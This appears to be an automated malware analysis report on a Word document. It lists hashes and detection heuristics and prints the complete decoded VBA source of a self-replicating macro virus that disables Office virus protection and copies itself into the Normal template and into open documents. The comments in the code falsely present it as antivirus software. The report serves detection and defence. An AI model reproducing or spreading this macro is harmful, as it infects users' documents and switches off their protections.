Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 94d0645dd73b7534…

MALICIOUS

Office (OLE) / .DOC

Size: 29.5 KB
Created: 2001-06-21 14:56:00
Authoring application: Microsoft Word 8.0
First seen: 2012-10-03
MD5: dec93050b1d778f78b14c01eeda85f01
SHA-1: 2a88afe39e8fcb30da089a44b2ae3cb93a042605
SHA-256: 94d0645dd73b75346126447ba0d623232b6358fef78a49e28a58a4b94d905255
Risk Score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document containing VBA macros. The critical heuristic that fired indicates self-replication and AV tampering, suggesting the macro attempts to persist itself. The VBA code explicitly manipulates the Normal template's code module, likely to ensure execution on subsequent document openings or system restarts.

Heuristics 2

  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          .DeleteLines i, j

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3079 bytes
SHA-256: 0bb8390b83d5f3617220a0eb35409100ec840b3f6fd7974a2ca2169fcdd95010
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - This is the smallest of all known MacroAntivirus modules!
'Principle of operation: Loads together with the document and blocks
'                        the spread of infected modules
'
'Distribution terms: Freeware (free)
'Advantages:         Correct operation, reliability!
'Disadvantages:      None found so far
'
'"All this is fine, of course, but I didn't understand a damn thing: how
' can I get it?!" you will say angrily. You can!
'Grandpa MustDie will tell you everything!
'You only need to open a document on a personal
'computer where the Murka antivirus module is already installed.
'
'To the author: mustdie@chat.ru
'To Murka:      murka@chat.ru
'To Danilov:    antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
  s = ActiveDocument.Saved
  Application.EnableCancelKey = wdCancelDisabled
  With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
  str = "Document_Close"
  With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Murka = .Lines(i, j)
  End With
  With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      NormalTemplate.Save
    End If
  End With
  With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    i = .ProcBodyLine(str, vbext_pk_Proc)
    j = .ProcCountLines(str, vbext_pk_Proc)
    Other = .Lines(i, j)
    If Other <> Murka And Murka <> "" Then
      .DeleteLines i, j
      .InsertLines 1, Murka
      Randomize
      If Rnd < 0.300000007450581 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
      If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Документ" Then
      Else
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      End If
    End If
  End With
  If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub